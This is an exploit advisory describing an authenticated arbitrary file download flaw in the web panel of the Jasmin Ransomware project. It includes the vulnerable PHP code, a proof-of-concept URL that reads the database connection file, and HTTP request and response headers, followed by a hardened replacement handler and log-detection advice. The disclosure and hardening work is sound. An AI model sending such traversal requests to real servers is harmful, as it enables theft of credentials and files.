Jasmin Ransomware - (Authenticated) Arbitrary File Download

2025.03.22
Credit: bRpsd
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
# Google Dork: N/A
# Date: 22-03-2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: N/A
# Tested on: MacOS local xampp

Authentication can be easily bypassed due to SQL Injection as mentioned in:
https://www.exploit-db.com/exploits/52091

Vulnerable file: Web Panel/download_file.php
Vulnerable parameter: file

Vulnerable code:

<?php
session_start();
if(!isset($_SESSION['username']) ){
    header("Location: login.php");
}
$file=$_GET['file'];
if(!empty($file)){
    // Define headers
    header("Cache-Control: public");
    header("Content-Description: File Transfer");
    header("Content-Disposition: attachment; filename=$file");
    header("Content-Type: text/encoded");
    header("Content-Transfer-Encoding: binary");
    // Read the file
    readfile($file);
    exit;
}else{
    echo 'The file does not exist.';
}
?>

Proof of concept:

http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php

Request headers:

Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

Response to the GET:

HTTP/1.1 200 OK
Date: Sat, 22 Mar 2025 09:42:09 GMT
Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
X-Powered-By: PHP/7.4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Description: File Transfer
Content-Disposition: attachment; filename=database/db_conection.php
Content-Transfer-Encoding: binary
Content-Length: 95
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/encoded;charset=UTF-8
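The vulnerable handler above passes $_GET['file'] straight to readfile() and also echoes it into the Content-Disposition header; in addition, the login check only sends a redirect header without calling exit, so PHP keeps executing and serves the file even when no session exists. The following hardened handler is an added example written for this advisory, not code from the Jasmin-Ransomware project. It assumes downloadable files live in a single directory (the hypothetical $downloadRoot) and keeps the original session marker 'username'. It accepts only a bare file name, canonicalises it with realpath(), and refuses anything that resolves outside the root, which covers '..' sequences, absolute paths, stream wrappers and escaping symlinks alike.

```php
<?php
// Hardened replacement for Web Panel/download_file.php (added example, not the
// project's own code). Assumption: all downloadable files sit under $downloadRoot.

session_start();

// The original code only sent the Location header; header() does not stop the
// script, so the exit is what actually enforces authentication here.
if (!isset($_SESSION['username'])) {
    header('Location: login.php');
    exit;
}

// Hypothetical download directory; adjust to the deployment. realpath() returns
// false when the directory does not exist, which we treat as a hard error.
$downloadRoot = realpath(__DIR__ . '/downloads');
if ($downloadRoot === false) {
    http_response_code(500);
    exit('Download directory is not configured.');
}

/**
 * Resolve a user-supplied name to an existing regular file inside $root.
 * Returns the canonical path, or null when the request must be refused.
 */
function resolveDownload(string $root, string $requested): ?string
{
    // Null bytes make realpath() throw on PHP 8 and truncate paths elsewhere.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Only a bare file name is allowed: any directory component is rejected,
    // so '../database/db_conection.php' and '/etc/passwd' never reach realpath().
    if ($requested !== basename($requested)) {
        return null;
    }
    $candidate = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Defence in depth: the canonical path must still start with the root,
    // which also catches symlinks inside the directory that point elsewhere.
    if (strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

$path = resolveDownload($downloadRoot, (string)($_GET['file'] ?? ''));
if ($path === null) {
    // Same message for "not found" and "refused" so the response does not
    // reveal which paths exist.
    http_response_code(404);
    echo 'The file does not exist.';
    exit;
}

// Build the Content-Disposition value from the resolved base name, quoted and
// stripped of double quotes, rather than from the raw query parameter.
$name = str_replace('"', '', basename($path));
header('Cache-Control: private');
header('Content-Description: File Transfer');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Type: application/octet-stream');
header('Content-Length: ' . (string)filesize($path));
readfile($path);
exit;
```

If the panel needs files from more than one location, keep a server-side map from opaque identifiers to paths and look the identifier up instead of accepting any file name at all; the check above then reduces to an array lookup. On the detection side, requests to download_file.php whose file parameter contains a slash, '..' or a scheme prefix are worth alerting on in the web server access log, since a legitimate client of this handler only ever sends a bare name.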


Copyright 2025, cxsecurity.com
